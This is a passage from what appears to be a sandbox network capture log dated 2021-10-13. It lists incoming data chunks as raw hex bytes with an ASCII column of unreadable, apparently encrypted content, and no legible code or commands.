51 52 bc 13 08 04 54 ec 9a b8 27 81 b3 cd ed b2 7f 50 07 ad 48 64 8a dd 82 71 Data Ascii: 1{Kib~qZtPdCp7zJHV/6v (.cHrP3m!;~cIV.pV/G@A]h74-GX{vOz(t$L[ &F'o}_"9[o~qS(KcFv'ii2YHcdQRT'PHdq
2021-10-13 11:06:38 UTC	73	IN	Data Raw: f7 a8 32 fd d8 2c 53 e9 f8 9d 03 cb b9 12 2a 01 54 dd c8 2a 45 8a b8 26 32 dd ca 83 54 72 14 ef 43 94 92 62 b8 fc 2c 92 20 c3 70 26 81 09 4d cf a5 8f 6f a5 f1 30 6c 52 20 1d 64 fe 8d 18 9d fa 57 68 fd ae a0 cb b5 68 bb b2 b9 49 b0 0c 7f c5 af c5 4f f7 72 f4 c3 6b 1f df 63 90 4c e5 2e bf 9d 37 52 d9 a3 c9 66 73 a0 8e 29 5e 7f fb 38 e1 b6 9e 19 9e 20 eb 0c f4 6e 8a e8 90 84 4e 0e 7a de 5c c1 c5 94 b5 49 dc d2 16 7b 50 ad 05 ef c9 1c de b5 82 77 b3 42 db cc 24 30 49 2a 08 a0 a0 8c 20 96 4f 1c 0d 35 91 f1 97 c0 ab 90 2c 3a 3e c8 fb aa 48 e8 76 b6 b2 e6 61 6c 9a fc 64 7f 3e a3 07 31 ca d4 cc 2e 26 25 44 5f 9d 38 6a 16 0e 78 63 89 ef 73 c9 48 9b 0e 95 43 c0 b3 2c 28 29 ec 61 06 bc 82 ca 1d 28 96 9e b0 8b fc 67 94 83 b7 48 fb 5f 2c 96 31 d9 cd 74 c0 6c a4 67 fe Data Ascii: 2,STE&2TrCb, p&Mo0lR dWhhIOrkcL.7Rfs)^8 nNz\I{PwB$0I* O5,:>Hvald>1.&%D_8jxcsHC,()a(gH_,1tlg
2021-10-13 11:06:38 UTC	75	IN	Data Raw: 39 b3 fb ac 30 f1 f3 ad 67 9c 95 15 38 90 c3 f5 45 37 9d c9 f5 04 89 20 22 5c c3 3d cc 10 b8 51 66 af b8 99 12 91 bb 79 e2 28 32 9d 81 36 d9 21 f8 e5 bc 8f bb a4 06 72 14 1d 44 c1 d6 e7 80 b3 2d a9 6c b7 f5 ff c7 96 fc 90 00 19 cb e8 0f 37 7b ba 62 8f 91 4f 0d b9 cc 61 7b 67 da ce 07 5b 74 8e 45 79 b4 94 33 d9 75 f5 87 4b 66 2b d7 a0 59 4c 9f 15 4a f8 b9 7f 44 2e c5 9d 8c a3 ec 0e 2c 86 a5 4f 8a f2 e8 e4 ed 6e df 4b f0 88 f6 78 8b ba 82 55 28 e0 38 30 b6 6d e6 bd 9c 27 f5 af 63 67 a8 8c 7c fc 88 8e e9 92 70 22 38 d6 2c 63 72 e4 40 68 ae 3c be 9c c8 45 45 6c fa 92 df 44 f1 25 7e d3 06 83 f3 af ff 92 36 a3 99 31 28 31 a5 db 6e c6 67 66 dc ff b6 ca fd d3 c4 e2 e6 65 19 62 d3 94 a6 e5 fd e0 1c ff e2 d4 80 a2 a2 90 a3 82 c6 79 5a 37 9a 2a c3 58 e9 45 27 68 ab Data Ascii: 90g8E7 "\=Qfy(26!rD-l7{bOa{g[tEy3uKf+YLJD.,OnKxU(80m'cg\|p"8,cr@h<EElD%~61(1ngfebyZ7*XE'h
2021-10-13 11:06:38 UTC	76	IN	Data Raw: 22 72 0a 06 49 18 bc ff f0 84 e5 6a 11 61 bb de 84 0c 87 62 3d 8e 28 d7 8b 7c 91 f9 55 c4 ba 5a e1 41 57 ea ef cc d4 28 6d 5a 44 5e c4 11 47 87 9e 37 e6 83 01 6b e3 d9 38 41 c3 87 ce aa 30 47 78 da b3 e0 2d cf 3e 9c 96 00 7f 86 a9 e2 be 15 74 37 23 60 f7 e0 dd 01 cb b9 91 2d 02 4b c3 f7 c2 bb 8b 94 af 27 fb ef 9e 74 af 02 c7 6d 08 83 66 b1 a5 e4 f6 bc d2 61 2d 96 29 e2 d0 ae 71 f2 98 f1 ff 6d 4d 6b 83 5d e4 92 04 b7 25 48 64 f0 32 b8 da b2 8b a5 c4 2d 60 ec 11 61 de 2c cd 4c e8 64 f0 6e f6 22 c5 69 a7 69 6d 05 b9 8b 1e 6f d7 b2 cd 66 13 89 8e 29 5e ff e7 36 ff b6 9b 7b 8e 02 e6 17 b4 c5 9e e6 8f b2 a8 20 7a de ca c6 8b fa ab 3e 40 dc 13 6d 4f e7 86 ef 39 01 ed f7 ce 44 bd 5f c6 a3 ac 21 47 3e 24 46 b2 81 20 03 41 1b ec 3d 9d 01 47 9c ab 0c 3c 1c 35 c2 e4 Data Ascii: "rIjab=(\|UZAW(mZD^G7k8A0Gx->t7#`-K'tmfa-)qmMk]%Hd2-`a,Ldn"iimof)^6{ z>@mO9D_!G>$F A=G<5
2021-10-13 11:06:38 UTC	77	IN	Data Raw: ff a5 11 63 e4 7c 47 03 f9 94 91 65 82 3f 9b 08 b3 7e 2c dd 78 c0 af af 7e b9 99 5a 8b c9 da be f2 b6 87 21 30 c1 00 7a 5e a9 da d6 69 06 76 94 7f 18 36 49 e8 e7 aa f8 98 99 0f 27 47 6d 49 93 95 c4 96 40 95 a1 53 fa 71 41 2f 6a 1e 37 b7 fb ac 30 f1 f3 ad 67 fc 90 44 52 90 d8 c1 66 15 6e cb 88 6e 29 20 26 67 b0 87 cc 03 82 58 79 9b 90 22 12 97 b1 73 f5 16 98 b2 9a 30 f6 88 06 e4 9a fe b5 ad 06 7f 0f ea 2a fa d6 f0 81 9e 26 99 30 b2 d9 fb c4 8c d5 73 08 65 8a e1 27 90 55 98 66 e3 f5 26 0d b3 db 47 6d 74 d1 e5 ab 58 74 a6 54 75 a5 3a a9 ca 60 f2 88 0f 67 29 d0 bd b4 43 a5 04 5f cb ca 79 52 d0 d5 bf 9f b9 7d 1d 2d 8f 5d 21 2a f1 c3 ec ee 29 d9 30 9a a0 48 7c a1 92 93 53 44 89 10 01 b2 47 ec 84 db 35 c5 ad 10 98 a9 8c 76 7e 8f 9f ff 90 53 75 21 d6 2d 63 01 e2 Data Ascii: c\|Ge?~,x~Z!0z^iv6I'GmI@SqA/j70gDRfnn) &gXy"s0&0se'Uf&GmtXtTu:`g)C_yR}-]!)0H\|SDG5v~Su!-c
2021-10-13 11:06:38 UTC	79	IN	Data Raw: 26 44 06 9d 3c 3f 20 7f 13 35 7f cf 84 41 73 58 2b 80 e7 bf fb da 67 5d 8d d6 6b 4a c2 32 52 1c 8c 8f 3f 0f 05 4b 70 b8 44 b9 d8 b4 03 11 6d a4 f0 be 61 8c f7 33 bd 15 b5 23 b5 96 2b 2e 84 b3 77 d7 ca ac 5d 94 9b 4f 3b 25 80 b6 41 0a 70 00 0e 32 5b 95 6d f7 86 80 47 08 60 bd d7 a6 93 8e 4a 0c e1 00 df a3 4e fe ae 5e 1a bc 76 d5 52 66 f8 ef e4 d4 28 6d 52 51 4b d5 0b 56 ac 85 36 ff 96 d7 76 cd db 2a 60 d0 b0 db 54 9a 69 7a cd 1b e0 2a c6 d6 90 82 9f 56 84 82 01 b5 71 1a c9 22 48 d5 fa 4a 00 b6 c2 8e 3b 0b 61 ca e8 d1 56 ba ba ba 0b d3 d5 9b 7c a9 14 fe 55 03 a8 77 a7 e2 24 08 bd fe 7c 21 90 29 ec d9 5b 8e df b6 e8 24 77 4a 73 7f 74 dc 90 2f bf 02 b4 6a 86 4e b1 c5 ae 5f 86 ea 26 25 c2 13 61 da 19 d4 41 e8 7e db 92 f7 26 d1 6e 8f 54 68 05 ae 8b 3d 6a cc b2 Data Ascii: &D<? 5AsX+g]kJ2R?KpDma3#+.w]O;%Ap2[mG`JN^vRf(mRQKV6v`TizVq"HJ;aV\|Uw$\|!)[$wJst/jN_&%aA~&nTh=j
2021-10-13 11:06:38 UTC	80	IN	Data Raw: dc bc bc 8b 10 e1 b8 dd 26 f4 41 99 15 60 31 b6 9e 24 8f d7 da ff 52 bc bf 9b e7 c9 14 ad e4 25 13 c7 48 81 bf 32 3f f5 fc f0 6c 58 55 00 a5 53 c8 03 2e 96 77 cf a0 0f 72 b5 ca ba eb ec 13 98 99 82 c9 06 30 ff b3 51 2f 86 bc 5c 67 e8 21 1c 7c fc 4a 54 02 d5 96 1a 68 9d 18 9c 8d 2e 54 31 d7 65 ff d0 ab 1a f2 b9 d6 8f e3 f8 20 f7 d4 cd 01 d5 c5 2a 7a c2 af d6 c2 74 4d c2 92 60 3d 2f 0f 74 f0 a3 d5 ac 8f 93 26 4f b4 68 7e 97 dc 9d dc 94 a8 85 db d3 43 38 61 82 36 b0 2c 8d e2 f3 d8 af d0 19 8d 15 18 46 d8 c5 4c ab 6a d7 de 24 ce 20 22 4d 2c 81 d3 3c ad 7d e5 b5 8f 0f 0d e4 2d 75 fb 2e 8f 05 87 2f de bf 73 e5 b6 fc 31 a0 19 48 06 5d b7 d0 cb d6 9c 02 27 9e fc 93 29 f9 ef 8e 62 96 15 2d fe ee bb 92 60 8e 7b d0 14 4b 12 86 ff cd 6d 74 d1 6a 9d 45 42 ae ca 75 a5 Data Ascii: &A`1$R%H2?lXUS.wr0Q/\g!\|JTh.T1e *ztM`=/t&Oh~C8a6,FLj$ "M,<}-u./s1H]')b-`{KmtjEBu
2021-10-13 11:06:38 UTC	81	IN	Data Raw: d8 ed 86 b6 25 f1 59 ff 80 0c 48 a3 78 45 6a cf 08 88 c2 8b 38 78 c3 8b da d5 d9 24 b1 e8 b3 e8 7e 7d 40 71 38 fd db 62 2c 4a 4c 4c 6a 98 c1 b6 eb c6 13 50 52 bb 16 15 64 5d 4f 9a a3 27 bd 07 4c ef b8 51 df 8e aa 4e 4c 84 c8 96 63 0d ca 0d b5 08 2d ac 46 60 13 7c e7 3a 3b 71 21 52 db e7 b9 9e 92 79 54 98 df 68 73 8b 21 ac 1b cf a4 2a 1c 04 24 5a b2 5b ad 24 da 6d 12 46 a7 cb b2 a0 76 08 3c f8 3d b7 30 8f fc 78 66 84 b5 75 13 88 ad 4c 84 94 4c 4a 20 88 a7 d0 23 5e 02 1c 51 0e 9c 75 0f 85 c3 0a 0b 1e 1d d4 8e d6 9d 62 98 8f 28 d7 a8 5d 9d f9 57 0c 44 5d e7 43 41 f6 ef c4 cd d6 6c 76 53 60 c6 36 90 af 09 36 f8 8b 2e 6d e6 57 85 71 0a d8 d9 ab 9b 4f 52 da 10 e0 3e ee 2d 91 5b 9d 7d 86 05 e2 b7 1b 77 c4 09 0f ff d1 50 fd ca 95 8b 3f 1b 1a d3 e5 d1 4c 9d 46 bb Data Ascii: %YHxEj8x$~}@q8b,JLLjPRd]O'LQNLc-F`\|:;q!RyThs!*$Z[$mFv<=0xfuLLJ #^Qub(]WD]CAlvS`66.mWqOR>-[}wP?LF
2021-10-13 11:06:38 UTC	82	IN	Data Raw: 74 9f 50 63 5b 9e 85 c9 66 f7 87 24 6d 2d cc 54 4b 6e 8b 2d 45 eb 41 77 6e 2e cf a3 9e ae 9d 1f 2a 97 0c 20 06 e2 ea 90 56 ca db 41 e0 88 66 78 8b ba 87 7e 19 e6 6e 92 b6 6d e6 92 f3 08 f5 af 1a a6 9a 8e 5d e0 8b e1 7d 86 58 54 2c fe 04 74 ff e9 56 5b a4 07 9f 8f c7 55 5e b4 f7 81 d0 57 e2 27 69 b4 ae 94 7e 8a f4 83 30 a3 99 36 2a 37 a3 56 10 1e 70 4e 71 ec a4 eb c5 d3 c4 e5 66 26 e7 72 c3 88 2f c6 eb f2 17 dd 04 c3 80 a8 cc 74 b7 82 cc 62 62 14 4d 39 d9 3d ec 54 35 5b 64 83 e4 82 b6 29 d4 3b f8 ef 31 59 a5 6f 41 bb dc 0a 90 d1 a2 29 79 ef 86 cc cc c4 41 bb 8d 4c 1d a9 df 56 62 35 eb e2 47 32 b4 47 76 63 81 c1 8f 53 ea 63 57 3d 71 07 1c 1a 7b 5e 96 d7 19 ab 2f c7 c5 07 53 c9 05 bb 66 62 85 dc 88 61 16 62 04 9d c2 3e 20 7f 0f df 7d cf 84 3c 60 27 15 b5 e5 Data Ascii: tPc[f$m-TKn-EAwn.* VAfx~nm]}XT,tV[U^W'i~06*7VpNqf&r/tbbM9=T5[d);1YoA)yALVb5G2GvcScW=q{^/Sfbab> }<`'
2021-10-13 11:06:38 UTC	83	IN	Data Raw: 40 65 0a b8 ba 23 8c f5 1b 74 a9 14 c1 14 0f a9 70 aa e5 3a ee 42 d3 52 34 98 2b 90 09 a5 8f f7 3a 48 1e 63 54 66 81 7c e9 6c 05 91 2d 41 42 e7 3f b1 cc b0 8b a5 c4 3c 5b bd 0d b7 d2 38 ff 68 ef 6f 90 56 f7 0e d5 e0 38 4b b2 34 13 8b 1c 5a da b2 ce 66 ad 39 a2 2b 49 ee ea 3f ea 57 90 a9 8d 05 f1 38 18 f5 8c 30 82 a3 88 3f a9 dd de 06 e1 8e b9 0e 46 c3 b5 61 4f ee 2a fe c7 11 d7 ea 17 5e 62 5f c4 8b b8 30 4e 2f d6 58 8c 89 36 00 42 01 1b 3c a0 11 8b 3e aa 20 11 25 25 d4 68 9b d4 f9 79 bf 91 fd e1 6c 90 ed fc 71 39 30 34 11 3e d5 da 06 86 36 4a 4a b8 1a 03 8a 15 5e ce 87 f0 35 79 70 88 02 93 63 3a ba 35 d6 b4 d1 64 0b 34 ae b9 90 28 85 9d b9 9c 2b 73 a0 a2 97 b6 fa 79 3c 88 24 dc e5 5d c9 72 50 bb 15 e5 8d 5f 9c 9c de 24 db 38 f7 49 da 14 60 3b 06 f5 2a 9c Data Ascii: @e#tp:BR4+:HcTf\|l-AB?<[8hoV8K4Zf9+I?W80?FaO^b_0N/X6B<> %%hylq904>6JJ^5ypc:5d4(+sy<$]rP_$8I`;
2021-10-13 11:06:38 UTC	84	IN	Data Raw: cf f5 04 36 02 31 42 b0 96 c3 0f 9a a4 78 9f b1 20 69 59 b1 73 e0 73 ad 9b 81 3a e9 f5 8b da b4 fc a7 8e 46 7a 19 1e 3d 96 47 19 75 61 3e a8 dd bc f5 e8 e0 91 cd 6e 0b 32 c0 e3 5c 5c 7f ba 60 93 b6 4f 0d b9 c6 07 1e 4b d3 f6 91 72 34 8c 54 7f b3 df 81 cd 71 e4 9c 10 6f 26 d7 bb 45 5d b1 f8 46 ec c3 46 ee 29 d4 93 82 97 65 12 2a 86 ac 3f 4f 0d e9 c2 fe c8 d9 48 e7 aa 26 af 0f aa fe d4 38 e5 16 72 88 6f ec 8e a5 65 f7 af 1a 98 ed 8e 76 e5 8d e4 29 86 58 5a 49 93 28 74 f5 cb 06 6a af 25 99 ca c5 53 5e 06 dd 82 d0 51 fe 7e 7d c8 12 85 71 9f f6 6c 36 9c 9a 22 3e 30 64 ca 54 d7 70 4c 06 36 b6 c0 df dd df e7 79 49 17 7c dc a0 c2 cc c0 f5 15 e4 3b c3 fb 68 a3 b8 b3 8b d7 7a e4 b4 0a 44 56 33 df 56 28 69 a9 ff 47 b9 48 22 f5 24 c7 9b 01 5b a5 7a 6a 72 c0 19 92 d2 Data Ascii: 61Bx iYss:Fz=Gua>n2\\`OKr4Tqo&E]FF)e*?OH&8roev)XZI(tj%S^Q~}ql6">0dTpL6yI\|;hzDV3V(iGH"$[zjr
2021-10-13 11:06:38 UTC	86	IN	Data Raw: 4a 0a 8f 00 ee a2 44 9b d1 05 1a ba 56 a4 c0 57 fa e9 40 eb 28 6d 5b 42 4d db 0f 4e 88 9e 27 f7 9e 3a 89 e0 f5 1f 6d 5c f1 cd aa 9a 54 7e dc 9c a6 2d de 29 b9 1a 9d 7d 8c 81 d1 b6 0a 6b de ae 73 ff d8 49 2b f8 b8 8e 31 27 00 c8 e8 db 4f 95 ac a9 2c d3 c4 94 6b 8e ea ee 6f 01 bb d8 5a 1a cc e9 94 c1 71 39 8a 26 f4 e3 5b 8e df f7 fd 54 be 4d 6b 85 7d e1 96 d2 32 02 57 68 ff 1a f8 c7 aa 7f a6 93 e3 58 be 17 67 ad 0d d6 41 e2 7c ee e3 c8 0c d1 64 a7 1d 6a 05 b5 b5 74 43 d7 b8 ce 66 c5 8f e1 3d 5f e3 e0 4b 24 a9 91 81 90 03 e0 1c 9c e3 94 f9 b6 5a 81 22 77 cf c4 c1 c6 b0 bc 3f 40 c3 07 20 5c e1 99 ef c8 1f df 07 1f 4a 9c 56 d5 82 b1 30 4e a2 37 54 ca 56 4c 29 5e 12 12 3c b1 18 97 80 f0 24 ac 34 21 c8 5d 3b cb e6 6b a6 b9 d7 ec 73 da 02 f9 42 39 84 3e 15 3e d4 Data Ascii: JDVW@(m[BMN':m\T~-)}ksI+1'O,koZq9&[TMk}2WhXgA\|djtCf=_K$Z"w?@ \JV0N7TVL)^<$4!];ksB9>>
2021-10-13 11:06:38 UTC	87	IN	Data Raw: f9 7a fa 43 bb fb d1 b5 59 98 f0 f7 bc e0 c4 f1 6c ce c4 06 78 75 ac f1 74 98 f9 a1 be 7f 03 00 4e e8 87 bb f3 b3 34 0f 20 41 91 33 79 97 dc 99 43 16 26 b2 f6 1d 07 3e 61 1e 32 ac 76 93 1e f3 d2 b6 26 6c ad 3d 38 9a f0 84 4e 37 66 e0 b7 06 29 2a 3a 22 34 86 cc 16 c1 64 7b b3 9a 5c 51 93 b1 79 cc 44 91 99 8b bc 11 9f f8 e4 ba ea a0 a4 7d b3 19 14 2f fa 91 e5 f1 55 21 81 ca 3d 42 f4 ed 8c 85 5b 0a 1e e5 95 a6 94 7f bb 66 9b 43 4d 0d b7 51 da e1 4b d1 f6 9a 52 5c bd 55 75 af b7 f3 ca 71 ee 94 f2 f1 03 d7 aa 48 6a c1 04 47 ca be 5d 44 2e cf ee 56 ae 76 19 01 84 a1 28 2e a9 e8 ee cf dd 0d c6 dc a0 48 7a f6 7b 91 50 3d f3 18 29 ec 6d ec 8e c8 37 e6 a9 28 21 ac 8c 76 ed 8c ec d0 84 58 54 24 bc 59 4b fd e3 4a 40 ee 2d b1 87 d6 55 4c b1 2b c6 d2 57 eb 1c 2f c5 12 Data Ascii: zCYlxutN4 A3yC&>a2v&l=8N7f)*:"4d{\QyD}/U!=B[fCMQKR\UuqHjG]D.Vv(.Hz{P=)m7(!vXT$YKJ@-UL+W/
2021-10-13 11:06:38 UTC	88	IN	Data Raw: 93 95 99 66 5f f0 1c 68 62 84 44 6c 18 e3 ad 24 65 7c 1b 49 b9 4e 97 9a d9 41 1a 7b e2 fe 97 5e 89 f5 4e 19 3d b7 27 b6 e8 7e f9 0b 9f 75 b8 8a d6 8d 92 98 63 6a 2d a8 f9 2c 22 78 02 7f 9b 0e 94 69 f6 f7 d1 07 09 6a aa dc fd ed 89 4a 00 a6 69 df a3 4e 80 fd 2c 5f b8 5c c1 69 17 f8 ef c6 fc 6a 6f 5a 5b 5a c1 0c 50 08 b7 36 f8 83 52 ba e1 d9 36 dc bf a3 cc aa 91 e7 40 75 10 e0 2d dc 53 5a ae 9d 79 8f b8 e4 61 85 4b c9 22 4e 84 08 48 03 cf a8 83 13 48 4a ca e2 d3 3e 4c b8 ba 27 d4 a6 a5 76 a9 1e fe 4b 7b bc 6e a7 ef 1b b7 be d2 74 28 9f 5a ae cd a5 85 db f5 fd 2f 7d 65 29 83 75 fa 83 01 ac 24 d8 41 fd 32 b3 be 67 75 a4 ec 92 37 aa 12 61 d4 91 ff 15 ea 16 20 90 f7 0a d8 7f 89 8a e7 2f bf 9d 34 3a 07 b2 c7 74 42 35 8c 2e 2d dd e8 36 fc b8 99 f6 b0 2c f3 19 b4 Data Ascii: f_hbDl$e\|INA{^N='~ucj-,"xijJiN,_\ijoZ[ZP6R6@u-SZyaK"NHHJ>L'vK{nt(Z/}e)u$A2gu7a /4:tB5.-6,
2021-10-13 11:06:38 UTC	89	IN	Data Raw: d9 c2 74 c4 8f a3 aa 4b de 8e 85 69 23 0c d5 7b 34 97 23 3f 69 f0 4d 73 56 28 06 b7 64 1f 27 c0 90 60 42 3b 09 6d af c6 ff 66 e0 1a ac 48 89 55 06 8d f3 a6 04 a7 94 8b e1 78 fd b7 0c ef dc 6a b9 03 c3 be 77 6f 82 32 af f4 99 17 2c f4 01 27 4c ad 01 a4 18 5a 8f e2 e9 b8 e6 1d 63 34 30 c5 2b 52 16 ab c9 ec 1f 27 5e 94 64 65 fc 49 e8 f2 be 88 7f 82 0f 24 41 97 4e ae 93 46 b5 dc 92 b7 a7 59 4c 47 2f b7 0d 34 be 01 bc 14 cd 95 51 b3 e0 90 3d 43 59 d8 c5 48 30 e3 e3 f5 04 2b 5b f7 4d b0 83 db 7a 68 58 02 74 90 22 16 ff 69 c9 8b 86 92 99 87 1a f1 8c c8 e7 b6 d6 ad a6 06 7e 19 14 3a c0 df cc 91 9e 26 96 30 b2 d9 fb f7 85 fe 97 1c e0 e0 cd 25 83 74 ba 63 f8 76 4c 21 b1 f4 6f 46 97 d3 8d 50 5a 74 8a da c2 8f 9f a9 d9 41 e7 83 51 7c 29 d7 a2 4a 42 98 10 4c eb 91 7e Data Ascii: tKi#{4#?iMsV(d'`B;mfHUxjwo2,'LZc40+R'^deI$ANFYLG/4Q=CYH0+[MzhXt"i~:&0%tcvL!oFPZtAQ\|)JBL~
2021-10-13 11:06:38 UTC	91	IN	Data Raw: 9d ce 68 e3 ae ef dd c8 24 99 af 55 17 83 62 40 69 1b 69 cb 69 34 a7 44 40 51 8b c8 a7 60 c5 63 51 53 ae 0a 3c 11 7d 4f 9a 35 06 a9 2f cc fe bf 46 c2 2b 12 4c 4c 83 ca 94 64 36 7b 1e a4 0f 1a 20 78 60 13 6e db 9c 2f 59 bd 7b 81 e1 aa 9d 88 6d 75 5a d0 68 64 96 21 41 0e f1 b3 2c 08 2f 24 4a b9 44 ac c9 c9 52 38 fb a3 f3 90 4d 80 84 17 d0 3d b1 30 b7 e8 70 3e 88 da 5d ba 88 ab 4b 81 9d 71 6a 2d 0e 07 39 f8 61 15 17 53 25 80 7c fc 95 e1 94 1f 4e a9 c5 8b c5 5d 59 0f 9f 26 ca 75 57 9f e8 51 0b af 6d 2d 50 5b 8e 6e cc d4 29 7c 5f 46 91 d3 cb d0 ac 9e 36 f9 a9 61 75 e1 d3 46 79 d0 b7 d6 b9 96 54 70 f2 57 e1 2d d4 39 9c c1 85 7c 86 a3 8d 93 08 61 cf 34 5f fa cc 5b 05 dd a8 89 b5 b8 5c 10 fb c7 56 85 93 93 32 d4 c4 94 e5 bf 3a c8 52 0e 92 6b b6 ea a2 e9 b3 b3 56 Data Ascii: h$Ub@iii4D@Q`cQS<}O5/F+LLd6{ x`n/Y{muZhd!A,/$JDR8M=0p>]Kqj-9aS%\|N]Y&uWQm-P[n)\|_F6auFyTpW-9\|a4_[\V2:RkV
2021-10-13 11:06:38 UTC	92	IN	Data Raw: ca 02 ad 1c 99 44 90 21 10 8e 93 0d 7c 87 f1 17 4e 58 95 1b e9 35 29 b3 26 52 bc ea b5 02 6f 08 92 90 29 97 8b a6 8c 26 62 b4 ba 85 c6 4c 47 3c 86 1f bc e5 4c c6 7f aa ab 3d de 62 58 80 17 cd 33 f3 ea e5 61 2d 04 64 bd 51 98 3b 98 e0 d2 62 54 a9 db ed 40 c9 1e d7 69 26 26 df 68 31 ac 02 3a 69 41 ee 75 47 ec 9c a3 5d c4 30 ca ae db ce 3c 09 6d bf df ea 66 14 0d a8 8d 9c 5c 11 27 78 bf 15 ac 92 b0 48 78 ec b7 05 70 1d 6b 95 0b ed a9 87 6e 82 27 97 e5 b8 52 3f fc 65 fc b2 ac 29 dc 88 52 9e ea 76 0b c3 19 f1 39 23 cf 2a 6b 54 b6 d9 18 6a 2a 58 bf 96 07 21 5a e2 f6 ad f9 ac 8d f1 21 7c 94 5e ac 9f c3 8d 53 98 b7 bc f1 42 49 c6 60 32 3a be 03 ba ca e0 de b0 47 0c 98 3f 29 9a c7 cc b2 36 40 c3 f2 15 2d ae 95 9b bb 98 c6 03 b8 5a 68 b9 8f 36 ec 90 9d 61 f5 05 85 Data Ascii: D!\|NX5)&Ro)&bLG<L=bX3a-dQ;bT@i&&h1:iAuG]0<mf\'xHxpkn'R?e)Rv9#kTjX!Z!\|^SBI`2:G?)6@-Zh6a
2021-10-13 11:06:38 UTC	93	IN	Data Raw: 96 6c 80 ed 97 25 b3 a0 8c 38 27 b4 7e 78 d5 70 4e 53 4f b7 c0 dd d1 d3 e5 70 4b 7d aa c3 82 38 cf 97 3c 1c f5 36 d7 1a d9 7c b8 b7 86 a9 ed 73 03 9d 28 b2 f0 fc 45 23 7f 22 8b b8 82 b6 27 b6 45 fd 80 0c 85 ed 40 7e 56 cf 19 89 ce 92 c5 68 e7 ae a4 dd c8 28 a7 5a 48 17 87 4a fd 63 33 fb ec 7f 21 b3 65 58 50 8a c2 79 ce cb 4b 66 52 bd 0d 0f 19 7f 6f 9b b8 2d 29 07 18 e9 b8 51 e1 ac ac 4e 4a a3 ca 91 70 0d 51 0d b5 08 e4 20 68 67 2a fb ce 8e 3b 67 29 01 5d e7 b9 90 17 d1 4a 51 c3 b2 71 8f 24 59 22 2c a7 3d 0f 0d 5f 97 b9 44 bb cb d0 db 03 60 a0 88 4a 5e 89 f3 24 d9 2a 61 b9 ac f5 7a 54 59 b5 75 bc a4 e3 4c 94 89 6b 6f 08 56 b4 2e 24 64 8d 03 5d 0e 95 79 e5 90 c7 a6 09 60 b1 fc 12 d2 8b 40 1b 82 3c f5 1d 46 91 ff 49 97 bd 5c cb 40 42 ee fb e4 77 28 6d 50 79 Data Ascii: l%8'~xpNSOpK}8<6\|s(E#"'E@~Vh(ZHJc3!eXPyKfRo-)QNJpQ hg;g)]JQq$Y",=_D`J^$azTYuLkoV.$d]y`@<FI\@Bw(mPy
2021-10-13 11:06:38 UTC	95	IN	Data Raw: 9d af e4 89 ae 9f 34 15 35 c1 d0 c1 9d a6 2f 4c d6 23 e2 4f ee 99 f8 d6 0e ae cd 1c 66 b7 49 d5 87 d7 ce 47 34 22 36 ca 8e 20 00 4d 1f 03 31 99 a4 95 c0 ad 17 52 5f 23 c2 ee 88 e2 ff 69 a7 d6 f2 e1 6c 90 ed f4 79 e6 d3 03 10 3e de a3 44 b8 34 40 4c 81 2c 29 a4 1c 76 7a e8 9c 3d 55 53 b3 00 91 65 3a bd 43 1c b7 fd 65 7a d5 87 b9 9a 0f bd be b2 82 0a 02 b1 ab 86 65 e6 44 34 b8 19 d6 e5 4a af 00 ac ba 33 ee 8d 50 8d 01 ef 4b ef 3b e1 6b 44 79 62 31 20 be 2a 97 df 1f 70 5a b2 a6 aa 5b f7 42 52 87 dc 04 f2 58 20 b4 1a e4 6d fa e9 1a 2b 2e 9c a9 6a c3 28 d1 9c 63 e7 80 0b 6d a8 c3 78 70 ea 0c 85 92 99 41 28 8c e2 ac 1a 9b 91 a3 42 72 92 d0 18 63 e9 4c a8 09 fd b2 85 6e 84 57 ef f4 b2 58 08 f8 7f fa 47 c2 d7 d0 99 50 de ed fc fa dd c2 ea 01 8b c4 2a 7a 0a 82 cd Data Ascii: 45/L#OfIG4"6 M1R_#ily>D4@L,)vz=USe:CezeD4J3PK;kDyb1 pZ[BRX m+.j(cmxpA(BrcLnWXGPz
2021-10-13 11:06:38 UTC	96	IN	Data Raw: 46 2e 92 93 9d ae 76 1d 2a 97 a1 08 11 f3 e8 e4 c7 dc a6 aa f6 a0 4c 7b a3 3f 90 50 33 c9 1b 29 98 6f ec 82 a8 00 f7 af 1a ca ad 9a 44 e7 8b bf 11 79 58 5e 0b dd 02 5a fd e3 46 1b f8 2e b1 87 bd 51 57 14 87 83 d0 53 e3 30 13 27 12 94 7a aa ff 92 24 80 8b 20 7c 27 b2 47 7f d7 70 4e 79 fc b2 e8 69 c3 d5 f2 73 61 89 72 c3 88 10 c6 c4 ce 1e f5 34 b2 a6 a0 a3 b2 cd 8c c2 5b fd 02 9b 20 e5 27 d4 6b 25 69 be 83 7e 80 b6 29 a3 2f e8 fd e7 5b a5 61 54 64 c1 1d ab a5 9a c6 7f 92 64 cb dd cc 04 8f 8f 4c 04 b1 66 52 a8 33 fd ca 69 32 b4 4d 62 78 9d c8 a7 e7 ec 75 2c be bd 07 18 12 6a 32 77 b8 2d ad 2d ce 90 5d 57 c9 07 af 4a 31 63 dc 82 73 27 49 0d f5 03 3a ad 52 60 13 7c b2 69 3b 71 2f 78 f2 94 bb 94 93 1b be 8b d4 6c 60 fb d4 52 1a e7 a5 52 40 0e 24 41 bb 37 cc d8 Data Ascii: F.v*L{?P3)oDyX^ZF.QWS0'z$ \|'GpNyisar4[ 'k%i~)/[aTddLfR3i2Mbxu,j2w--]WJ1cs'I:R`\|i;q/xl`RR@$A7
2021-10-13 11:06:38 UTC	97	IN	Data Raw: 28 9e 32 15 ce 89 85 f4 b2 82 c4 77 4d 6f 9d 66 f5 92 15 b8 36 5e 96 fc 1e bb cc c5 0e a6 e8 2f 47 b4 00 64 de 22 d1 5c 16 6c c7 99 ff 61 aa 6c 8f 56 76 16 ba 9d 27 44 c9 4c c6 5c 44 3f ab d7 59 55 eb 36 f0 da ed 87 8f 24 80 6e 9e f2 91 eb 96 ad 93 0b 7a cf c5 cc 35 8f 86 28 46 e6 e6 67 f9 ef 99 f8 b4 7c c3 f9 14 15 c0 5d c4 81 b4 3c 54 31 28 48 a5 96 de 0b 72 18 14 3b cc f3 97 c0 af 17 2e 31 21 d3 e1 b2 2a f8 54 aa ae d5 e6 6c 8b f9 e7 64 ce bd 27 13 15 d1 f4 01 45 cb b5 6a 8e 25 1a ba 1d 76 47 87 f0 3f 98 59 95 00 8e 68 3f b9 2f 2e c1 6a 6f 15 b8 96 bd 82 2d be d5 a2 8f 28 62 b5 a1 ac 4f fd 21 a8 90 37 d4 cf 4f e8 12 ac ba 33 de 06 50 55 1e c4 0c ec 39 e1 6b 26 3d 58 31 2a 92 e5 99 cf e3 63 